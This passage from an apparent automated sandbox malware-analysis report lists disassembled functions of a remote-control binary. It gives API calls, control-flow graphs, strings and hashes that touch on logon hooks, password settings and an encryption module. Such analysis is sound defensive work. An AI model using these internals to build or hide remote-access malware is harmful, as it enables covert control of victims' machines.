                                                                                    • GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11086807
                                                                                    • GetProcAddress.KERNEL32(?,CipherServer_Destroy), ref: 1108681C
                                                                                    • GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock), ref: 1108682D
                                                                                    • GetProcAddress.KERNEL32(?,CipherServer_OpenSession), ref: 1108683E
                                                                                    • GetProcAddress.KERNEL32(?,CipherServer_CloseSession), ref: 1108684F
                                                                                    • GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks), ref: 11086860
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$LibraryLoad$FileModuleName
                                                                                    • String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
                                                                                    • API String ID: 2201880244-3035937465
                                                                                    • Opcode ID: 4b4bd3f155fc2ea4308a314feeb32441d96d80ab178d9e56264d575cdcc26986
                                                                                    • Instruction ID: c81deb3771c39ade44f8803fbe1e6421c41fb3d40bd553f41274565aeadcb2b4
                                                                                    • Opcode Fuzzy Hash: 4b4bd3f155fc2ea4308a314feeb32441d96d80ab178d9e56264d575cdcc26986
                                                                                    • Instruction Fuzzy Hash: CD51C174E1834A9BD710DF79DC94BA6FBE9AF54304B1289AED885C7240EAB2E444CF50
                                                                                    Function 11141890 Relevance: 35.7, APIs: 3, Strings: 17, Instructions: 672registryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2517 11141890-111418c6 2518 111418cf-111418e4 call 1110f420 2517->2518 2519 111418c8-111418ca 2517->2519 2525 111418e6-1114190e call 11060f70 2518->2525 2526 11141910-11141912 2518->2526 2520 111421f2-1114220d call 11161d01 2519->2520 2528 11141918-11141947 call 11061700 2525->2528 2526->2528 2533 11141950-1114195d call 11142e50 2528->2533 2534 11141949-1114194a RegCloseKey 2528->2534 2537 11141964-11141985 call 11144dc0 call 11143230 2533->2537 2538 1114195f 2533->2538 2534->2533 2543 11141997-111419ad call 1110f420 2537->2543 2544 11141987-11141992 call 11062d60 2537->2544 2538->2537 2548 111419c2 2543->2548 2549 111419af-111419c0 call 11060be0 2543->2549 2544->2543 2551 111419c8-111419e2 call 1110f420 2548->2551 2549->2551 2555 111419e4-111419f5 call 11060be0 2551->2555 2556 111419f7 2551->2556 2558 111419fd-11141a17 call 1110f420 2555->2558 2556->2558 2562 11141a2c 2558->2562 2563 11141a19-11141a2a call 11060be0 2558->2563 2564 11141a32-11141a79 call 11060760 * 2 2562->2564 2563->2564 2571 11141a80 2564->2571 2572 11141a87-11141a8e 2571->2572 2573 11141a90-11141a97 2572->2573 2574 11141a9d-11141aa5 2572->2574 2573->2574 2575 11141d9a 2573->2575 2576 11141aa7-11141aad 2574->2576 2577 11141ac9-11141ad0 2574->2577 2580 11141da0-11141da2 2575->2580 2576->2577 2581 11141aaf-11141abc call 110607f0 2576->2581 2578 11141af5-11141b03 2577->2578 2579 11141ad2-11141ad9 2577->2579 2585 11141b05-11141b07 2578->2585 2586 11141b0d-11141b0f 2578->2586 2579->2578 2582 11141adb-11141ae8 call 110607f0 2579->2582 2583 1114217f-11142187 2580->2583 2584 11141da8-11141df2 call 110d1550 call 1105dd10 2580->2584 2603 11141ac7 2581->2603 2604 11141abe-11141ac5 2581->2604 2607 11141af3 2582->2607 2608 11141aea-11141af1 2582->2608 2589 11142191-11142199 2583->2589 2590 11142189-1114218d 2583->2590 2637 11141f3d-11141f85 call 11060f40 call 1106b5c0 call 110679c0 2584->2637 2638 11141df8-11141e1f call 11060760 call 110607f0 2584->2638 2585->2575 2585->2586 2592 11141b11-11141b13 2586->2592 2593 11141b5d-11141b5f 2586->2593 2598 111421a3-111421ab 2589->2598 2599 1114219b-1114219f 2589->2599 2590->2589 2601 11141b15-11141b1b 2592->2601 2602 11141b2f-11141b31 2592->2602 2596 11141b61-11141b66 2593->2596 2597 11141b68-11141b6a 2593->2597 2609 11141b8b-11141ba5 call 11081bb0 2596->2609 2610 11141b73-11141b89 call 11081bb0 2597->2610 2611 11141b6c-11141b71 2597->2611 2612 111421b5-111421f0 call 11060640 * 2 call 111618c1 2598->2612 2613 111421ad-111421b1 2598->2613 2599->2598 2601->2602 2614 11141b1d-11141b2a call 11146450 2601->2614 2605 11141d85-11141d98 call 11146450 2602->2605 2606 11141b37-11141b3e 2602->2606 2603->2577 2604->2577 2605->2580 2606->2605 2615 11141b44-11141b58 call 11146450 2606->2615 2607->2578 2608->2578 2630 11141cac-11141ce9 call 1105de00 call 111319f0 2609->2630 2631 11141bab 2609->2631 2610->2609 2611->2609 2612->2520 2613->2612 2614->2571 2615->2572 2658 11141cf1-11141cf8 2630->2658 2659 11141ceb 2630->2659 2633 11141bb5 2631->2633 2634 11141bad-11141baf 2631->2634 2641 11141c3e-11141c7b call 1105de00 call 111319f0 2633->2641 2642 11141bbb-11141bc1 2633->2642 2634->2630 2634->2633 2689 11141f87 2637->2689 2690 11141fb3-11141fe8 EnterCriticalSection call 11060420 call 11060f40 2637->2690 2669 11141e21-11141e50 call 11146450 call 110607f0 2638->2669 2670 11141e52-11141e7a call 11060760 call 110607f0 2638->2670 2678 11141c83-11141c8a 2641->2678 2679 11141c7d 2641->2679 2648 11141bc7-11141bcb 2642->2648 2654 11141be7-11141be9 2648->2654 2655 11141bcd-11141bcf 2648->2655 2665 11141bec-11141bee 2654->2665 2663 11141bd1-11141bd7 2655->2663 2664 11141be3-11141be5 2655->2664 2667 11141d0a 2658->2667 2668 11141cfa-11141d08 2658->2668 2659->2658 2663->2654 2672 11141bd9-11141be1 2663->2672 2664->2665 2673 11141bf0-11141c2a call 1105de00 call 111319f0 2665->2673 2674 11141c32-11141c39 2665->2674 2676 11141d11 2667->2676 2668->2667 2668->2676 2669->2670 2709 11141eb1-11141ed8 call 11060760 call 110607f0 2670->2709 2710 11141e7c 2670->2710 2672->2648 2672->2664 2673->2674 2711 11141c2c 2673->2711 2674->2676 2683 11141d18-11141d1a 2676->2683 2685 11141c9c 2678->2685 2686 11141c8c-11141c9a 2678->2686 2679->2678 2691 11141d1c-11141d1e 2683->2691 2692 11141d3e-11141d56 call 11081c60 2683->2692 2695 11141ca3-11141caa 2685->2695 2686->2685 2686->2695 2698 11141f90-11141f9e call 110508e0 2689->2698 2724 11141ffa-1114200c LeaveCriticalSection 2690->2724 2725 11141fea-11141ff7 call 1102a9f0 2690->2725 2691->2692 2699 11141d20-11141d38 call 11081bb0 2691->2699 2718 11141d58 2692->2718 2719 11141d5b-11141d73 call 11081c60 2692->2719 2695->2683 2713 11141fa0-11141fa1 2698->2713 2714 11141fa3 2698->2714 2699->2572 2699->2692 2744 11141f11-11141f38 call 11060640 * 3 2709->2744 2745 11141eda 2709->2745 2720 11141e80-11141eaf call 11146450 call 110607f0 2710->2720 2711->2674 2722 11141fa4-11141fb1 call 110679c0 2713->2722 2714->2722 2718->2719 2734 11141d75-11141d78 2719->2734 2735 11141d7d-11141d80 2719->2735 2720->2709 2722->2690 2722->2698 2732 11142051-1114209e call 11133400 call 110d1550 call 110cff20 2724->2732 2733 1114200e-11142010 2724->2733 2725->2724 2768 111420a4-111420c1 call 110d12e0 2732->2768 2769 1114214c-11142179 call 110d07c0 call 1106b620 call 110d07c0 2732->2769 2733->2732 2741 11142012-11142034 call 11146450 call 1113cc30 call 111414a0 2733->2741 2734->2572 2735->2572 2741->2732 2767 11142036-1114204e call 11146450 call 11026ba0 2741->2767 2744->2637 2749 11141ee0-11141f0f call 11146450 call 110607f0 2745->2749 2749->2744 2767->2732 2782 111420c3-111420d7 call 11029450 2768->2782 2783 111420da-111420f0 call 11081bb0 2768->2783 2769->2583 2782->2783 2789 111420f2-1114210a call 11009450 call 11081a70 2783->2789 2790 1114212b-11142145 2783->2790 2789->2790 2797 1114210c-11142129 call 11009450 2789->2797 2795 1114214a 2790->2795 2795->2769 2797->2795
                                                                                    APIs
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 1114194A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Close
                                                                                    • String ID: Add [%s]%s=%s$Chg [%s]%s=%s$Client$Del [%s]%s=%s$Info. Lockup averted for AD policy changes$Info. Policy changed - re-initui$Info. Policy changed - reload transports...$IsA()$NSA.LIC$NSM.LIC$RoomSpec$TracePolicyChange$Warning. Can't calc AD policy changes$_debug$client$client.$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                    • API String ID: 3535843008-2062829784
                                                                                    • Opcode ID: 4154c40c43665f62878aea5254195e6e6e08202dfc88ecc93f42b5d3f19d5548
                                                                                    • Instruction ID: 6553b1da6d6d14651d2a1fffef45e08f8fb4271012d2e4188a9b1e9169dedbc2
                                                                                    • Opcode Fuzzy Hash: 4154c40c43665f62878aea5254195e6e6e08202dfc88ecc93f42b5d3f19d5548
                                                                                    • Instruction Fuzzy Hash: E4420778E002999FEB21CBA0CD90FEEF7766F95B08F1401D8D50967681EB727A84CB51
                                                                                    Function 11074A00 Relevance: 33.5, APIs: 13, Strings: 6, Instructions: 294threadtimeCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                      • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                      • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                    • InitializeCriticalSection.KERNEL32(0000000C,?,00000000), ref: 11074AE5
                                                                                    • InitializeCriticalSection.KERNEL32(00000024,?,00000000), ref: 11074AEB
                                                                                    • InitializeCriticalSection.KERNEL32(0000003C,?,00000000), ref: 11074AF1
                                                                                    • InitializeCriticalSection.KERNEL32(0000DB1C,?,00000000), ref: 11074AFA
                                                                                    • InitializeCriticalSection.KERNEL32(00000054,?,00000000), ref: 11074B00
                                                                                    • InitializeCriticalSection.KERNEL32(0000006C,?,00000000), ref: 11074B06
                                                                                    • _strncpy.LIBCMT ref: 11074B68
                                                                                    • ExpandEnvironmentStringsA.KERNEL32(?,?,00000100,?,?,?,?,?,?,00000000), ref: 11074BCF
                                                                                    • CreateThread.KERNEL32(00000000,00004000,11070C60,00000000,00000000,?), ref: 11074C6C
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 11074C73
                                                                                    • SetTimer.USER32(00000000,00000000,000000FA,11063680), ref: 11074CB7
                                                                                    • std::exception::exception.LIBCMT ref: 11074D68
                                                                                    • __CxxThrowException@8.LIBCMT ref: 11074D83
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalInitializeSection$CloseCreateEnvironmentException@8ExpandHandleStringsThreadThrowTimer_malloc_memset_strncpystd::exception::exceptionwsprintf
                                                                                    • String ID: ..\ctl32\Connect.cpp$DefaultUsername$General$Password$RememberPassword$destroy_queue == NULL
                                                                                    • API String ID: 703120326-1497550179
                                                                                    • Opcode ID: 7c8943816f378bc6fd854347406ceee894156ad89ebdfca9a8c75f1e5f5be459
                                                                                    • Instruction ID: 2d3153b5a6430d98d64e81d2a1e668bfe4de0d121a1dff3557e595bbadcf65c6
                                                                                    • Opcode Fuzzy Hash: 7c8943816f378bc6fd854347406ceee894156ad89ebdfca9a8c75f1e5f5be459
                                                                                    • Instruction Fuzzy Hash: 79B1A4B5A00359AFD710CF64CD84FDAF7F4BB48708F0085A9E65997281EBB0B944CB65
                                                                                    Function 11108D30 Relevance: 33.5, APIs: 14, Strings: 5, Instructions: 213libraryloaderCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                      • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                      • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                    • OpenEventA.KERNEL32(00000002,00000000,nsm_gina_sas,00000009), ref: 11108E0A
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 11108E19
                                                                                    • GetSystemDirectoryA.KERNEL32(?,000000F7), ref: 11108E2B
                                                                                    • LoadLibraryA.KERNEL32(?), ref: 11108E61
                                                                                    • GetProcAddress.KERNEL32(?,GrabKM), ref: 11108E8E
                                                                                    • GetProcAddress.KERNEL32(?,LoggedOn), ref: 11108EA6
                                                                                    • FreeLibrary.KERNEL32(?), ref: 11108ECB
                                                                                      • Part of subcall function 1110F2B0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EEC3F0,00000000,?,11110245,1110FDE0,00000001,00000000), ref: 1110F2C7
                                                                                      • Part of subcall function 1110F2B0: CreateThread.KERNEL32(00000000,11110245,00000001,00000000,00000000,0000000C), ref: 1110F2EA
                                                                                      • Part of subcall function 1110F2B0: WaitForSingleObject.KERNEL32(?,000000FF,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F317
                                                                                      • Part of subcall function 1110F2B0: CloseHandle.KERNEL32(?,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F321
                                                                                    • GetStockObject.GDI32(0000000D), ref: 11108EDF
                                                                                    • GetObjectA.GDI32(00000000,0000003C,?), ref: 11108EEF
                                                                                    • InitializeCriticalSection.KERNEL32(0000003C), ref: 11108F0B
                                                                                    • InitializeCriticalSection.KERNEL32(111F060C), ref: 11108F16
                                                                                      • Part of subcall function 11107290: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11189A56,000000FF), ref: 11107363
                                                                                      • Part of subcall function 11107290: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111073B2
                                                                                    • CloseHandle.KERNEL32(00000000,Function_00102C50,00000001,00000000), ref: 11108F59
                                                                                      • Part of subcall function 1109E9E0: GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA01
                                                                                      • Part of subcall function 1109E9E0: OpenProcessToken.ADVAPI32(00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA08
                                                                                      • Part of subcall function 1109E9E0: CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1109EA27
                                                                                    • CloseHandle.KERNEL32(00000000,Function_00102C50,00000001,00000000), ref: 11108FAA
                                                                                    • CloseHandle.KERNEL32(00000000,Function_00102C50,00000001,00000000), ref: 11108FFF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseHandle$Library$LoadObject$AddressCreateCriticalEventInitializeOpenProcProcessSection$CurrentDirectoryFreeSingleStockSystemThreadTokenWait_malloc_memsetwsprintf
                                                                                    • String ID: GrabKM$LPT1$LoggedOn$\pcigina$nsm_gina_sas
                                                                                    • API String ID: 3930710499-403456261
                                                                                    • Opcode ID: 1bb63630e84e06d7a5d883501c08249baca6a639cf459e52fb6089e18ee58e4a
                                                                                    • Instruction ID: 229803012459fbbe5cfd3a30b02a894d1af5bad55287ed163187595495ff030c
                                                                                    • Opcode Fuzzy Hash: 1bb63630e84e06d7a5d883501c08249baca6a639cf459e52fb6089e18ee58e4a
                                                                                    • Instruction Fuzzy Hash: DC81AFB4E0435AEFEB55DFB48C89B9AFBE9AB48308F00457DE569D7280E7309944CB11
                                                                                    Function 11138C30 Relevance: 31.8, APIs: 12, Strings: 6, Instructions: 348windowCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2924 11138c30-11138c47 2925 11139072-11139081 call 11161d01 2924->2925 2926 11138c4d-11138c54 2924->2926 2926->2925 2928 11138c5a-11138c61 2926->2928 2928->2925 2930 11138c67-11138c6e 2928->2930 2930->2925 2931 11138c74-11138c7b 2930->2931 2931->2925 2932 11138c81-11138c91 call 111450a0 2931->2932 2935 11138c93-11138c9a 2932->2935 2936 11138ca0-11138ce7 call 1105dd10 call 110637c0 2932->2936 2935->2925 2935->2936 2941 11138cf5-11138d1e call 1112c920 2936->2941 2942 11138ce9-11138cf0 2936->2942 2945 11138d24-11138d27 2941->2945 2946 11138dda call 110ea430 2941->2946 2942->2941 2948 11138d35 2945->2948 2949 11138d29-11138d2e 2945->2949 2952 11138ddf-11138de1 2946->2952 2951 11138d3b-11138d46 2948->2951 2949->2948 2950 11138d30-11138d33 2949->2950 2950->2951 2953 11138d48 2951->2953 2954 11138d4d-11138d65 2951->2954 2955 11138de3-11138dfe call 1105dd10 2952->2955 2956 11138e00-11138e0f PostMessageA 2952->2956 2953->2954 2966 11138dc1-11138dc8 2954->2966 2967 11138d67-11138d6d 2954->2967 2955->2956 2958 11138e15-11138e1a 2955->2958 2956->2958 2959 11138e25-11138e29 2958->2959 2960 11138e1c-11138e20 call 1110f270 2958->2960 2964 11138e2b-11138e33 2959->2964 2965 11138e4d-11138e76 call 11130410 call 11146ec0 call 1112cb20 call 111618c1 2959->2965 2960->2959 2970 11138e35-11138e4b 2964->2970 2971 11138e79-11138e81 2964->2971 2965->2971 2968 11138dd7 2966->2968 2969 11138dca-11138dd1 call 11131a80 2966->2969 2973 11138d6f-11138d74 2967->2973 2974 11138dbc 2967->2974 2968->2946 2969->2968 2987 11138dd3 2969->2987 2970->2971 2975 11138e83-11138e9d call 111618c1 call 11161d01 2971->2975 2976 11138e9e-11138ec4 call 11142e80 call 11146ee0 SetWindowTextA 2971->2976 2973->2974 2979 11138d76-11138d7b 2973->2979 2974->2966 2998 11138ed0-11138ee9 call 111618c1 * 2 2976->2998 2999 11138ec6-11138ecd call 111352b0 2976->2999 2979->2974 2985 11138d7d-11138d9f 2979->2985 2985->2974 2997 11138da1-11138db0 call 11145b40 2985->2997 2987->2968 3007 11138db2-11138dba 2997->3007 3011 11138eeb-11138eef 2998->3011 3012 11138f2e-11138f32 2998->3012 2999->2998 3007->2974 3007->3007 3013 11138f03-11138f0a 3011->3013 3014 11138ef1-11138f01 call 111352b0 3011->3014 3015 11138f38-11138f3a 3012->3015 3016 11138ffc-11138ffe 3012->3016 3020 11138f24 3013->3020 3021 11138f0c-11138f21 call 11131210 3013->3021 3014->3013 3014->3021 3022 11138f5c-11138f69 call 110f8640 3015->3022 3023 11138f3c-11138f3e 3015->3023 3018 11139000-11139002 3016->3018 3019 1113901d-1113902a call 110f8640 3016->3019 3026 11139013-1113901a call 11131210 3018->3026 3027 11139004-1113900e call 111352b0 3018->3027 3037 1113906f-11139071 3019->3037 3038 1113902c-1113903c IsWindowVisible 3019->3038 3020->3012 3021->3020 3022->3037 3040 11138f6f-11138f80 IsWindowVisible 3022->3040 3023->3022 3030 11138f40-11138f50 call 111352b0 3023->3030 3026->3019 3027->3026 3030->3022 3044 11138f52-11138f59 call 11131210 3030->3044 3037->2925 3038->3037 3043 1113903e-11139049 IsWindowVisible 3038->3043 3040->3037 3045 11138f86-11138f96 call 111450a0 3040->3045 3043->3037 3046 1113904b-1113906d EnableWindow call 11131210 EnableWindow 3043->3046 3044->3022 3045->3037 3053 11138f9c-11138fb4 GetForegroundWindow IsWindowVisible 3045->3053 3046->3037 3054 11138fc1-11138fcd call 11131210 3053->3054 3055 11138fb6-11138fbf EnableWindow 3053->3055 3058 11138fcf-11138fd5 3054->3058 3059 11138fde-11138ffb EnableWindow call 11161d01 3054->3059 3055->3054 3058->3059 3060 11138fd7-11138fd8 SetForegroundWindow 3058->3060 3060->3059
                                                                                    APIs
                                                                                      • Part of subcall function 111450A0: GetVersionExA.KERNEL32(111F0EF0,75BF8400), ref: 111450D0
                                                                                      • Part of subcall function 111450A0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
                                                                                      • Part of subcall function 111450A0: _memset.LIBCMT ref: 1114512D
                                                                                      • Part of subcall function 111450A0: _strncpy.LIBCMT ref: 111451FA
                                                                                    • PostMessageA.USER32(00030462,000006CF,00000007,00000000), ref: 11138E0F
                                                                                      • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                    • SetWindowTextA.USER32(00030462,00000000), ref: 11138EB7
                                                                                    • IsWindowVisible.USER32(00030462), ref: 11138F7C
                                                                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,00000000), ref: 11138F9C
                                                                                    • IsWindowVisible.USER32(00030462), ref: 11138FAA
                                                                                    • SetForegroundWindow.USER32(00000000), ref: 11138FD8
                                                                                    • EnableWindow.USER32(00030462,00000001), ref: 11138FE7
                                                                                    • IsWindowVisible.USER32(00030462), ref: 11139038
                                                                                    • IsWindowVisible.USER32(00030462), ref: 11139045
                                                                                    • EnableWindow.USER32(00030462,00000000), ref: 11139059
                                                                                    • EnableWindow.USER32(00030462,00000000), ref: 11138FBF
                                                                                      • Part of subcall function 11131210: ShowWindow.USER32(00030462,00000000,?,11139062,00000007,?,?,?,?,?,00000000), ref: 11131234
                                                                                    • EnableWindow.USER32(00030462,00000001), ref: 1113906D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
